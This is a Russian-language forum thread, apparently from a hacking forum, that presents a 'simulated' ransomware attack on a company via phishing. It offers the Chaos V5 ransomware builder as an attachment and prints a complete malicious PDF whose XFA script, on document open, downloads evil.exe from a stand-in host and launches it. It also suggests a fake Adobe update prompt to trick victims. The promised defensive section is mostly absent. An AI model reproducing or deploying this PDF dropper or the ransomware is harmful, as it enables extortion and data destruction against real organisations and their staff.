Уроки Симуляция Ransomware атаки на компанию.

[Бюджетный Бюджет]

Спойлер: Приветствие

Здравствуйте!
На момент выхода данной темы я уже починил свой ноутбук.
На данный момент у меня некоторые проблемы с учёбой. Появлятся на форуме будет намного проблематичнее и всяко-тако.
В данной теме мы рассмотрим двое сценариев атаки на компанию.
1. Email фишинг.
2. Использование уязвимостей.

В первом сценарии будем рассматривать способ атаки, когда в .pdf файл добавляют вредоносное вложение, после чего отправляют в отдел кадров/Тех поддержку и т.д.

Во втором же, рассмотрим вариант того, что IP одной из машин в локалке компании была засвечена в каком-нибудь шодане или ценсусе. Злой хакер-ломакер нашёл уязвимость и успешно проникнул в локальную сеть.

Также будем обозревать способы противостояния этим двоим атакам, системам мониторинга и т.п. Вите хат всё-таки.

Спойлер: Подготовка к атаке

Что нам нужно для ransomware атаки?
Много. А ещё саму эту ransomware.

Спойлер: Локер

Для начала это, на xss'e нашёл один интересный ransomware-builder, Chaos V5.
Файл прикрепил. За вшитые бяки не отвечаю! Всё тестить на виртуальной железке или вообще не тестить.

Настройки (Прежде всего, тема про защиту от атак а не их организацию. За все противозаконные деяния ответственность несёте вы сами!)

Сам билд. Без крипта и т.д.

Декриптор.

Спойлер: PDF-эксплойт

Скопировать в буфер обмена

%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
    /AcroForm <<
            /Fields [<<
                /T (0)
                /Kids [<<
                    /Subtype /Widget
                    /Rect []
                    /T ()
                    /FT /Btn
                >>]
            >>]
            /XFA 5 0 R
        >>
>>
endobj

2 0 obj
<<
/Type /Pages
/Count 1
/Kids [ 3 0 R ]
>>
endobj

3 0 obj
<<
/Type /Page
/Contents 4 0 R
/Parent 2 0 R
/Resources <<
  /Font <<
   /F1 <<
    /Type /Font
    /Subtype /Type1
    /BaseFont /Arial
   >>
  >>
>>
>>
endobj

4 0 obj
<< /Length 47>>
stream
BT
/F1 100
Tf 1 1 1 1 1 0
Tr(Hello World!)Tj
ET
endstream
endobj

5 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
    <interactive>1</interactive>
</pdf></present></config>

<template>
    <subform name="_">
        <pageSet/>
        <field id="Hello World!">
            <event activity="docReady" ref="$host">
                <script>
                    xfa.host.gotoURL("http://evildomain.xyz/download/evil.exe");
                    xfa.host.gotoURL("file:///C:/Users/%USERNAME%/Downloads/evil.exe");
                </script>
            </event>
        
        </field>
    </subform>
</template>
</xdp:xdp>
endstream
endobj



trailer
<<
/Root 1 0 R

>>
%%EOF

Строка 70-ят, как вы можете увидеть, открывает прямую ссыль на локер, строка 71 же его запускает.
Таким образом, при открытии pdf-файла будет загружатся и запускатся локер. А прикрыть это можно тем, что якобы "файл был создан в версии Adobe Acrobat выше вашей. Разрешите автоматическое обновление ПО для просмотра."

(Это - небольшой кусок того, что я хотел сделать. Однако, ситуация с тем, что все черновики которые я сохраняю куда-то исчезают, заставляет меня продолжить тему под данным постом.)

 

[Бюджетный Бюджет]

Да и сама тема, видимо, поломана.
Если заметили ошибки в тексте, сообщите.
(Chaos Ransomware Builder v5.rar - 60061)
Настройки, к сожалению, не остались.


PDF-эксплойт > Строка 71> xfa.host.gotoURL("file:///C:/Users/%USERNAME%/Downloads/evil.exe");

Половина текста удалилась, грусть, печаль. Допишу позже, наслаждайтесь Без Лаб.

 

[X-Shar]

Половина текста удалилась, грусть, печаль. Допишу позже, наслаждайтесь Без Лаб.

Лучше черновик в ворде сохранять наверное...
Что-то тема поломалась.)

 

[Бюджетный Бюджет]

Лучше черновик в ворде сохранять наверное...
Что-то тема поломалась.)

Ну, я заметил. Потом допишу.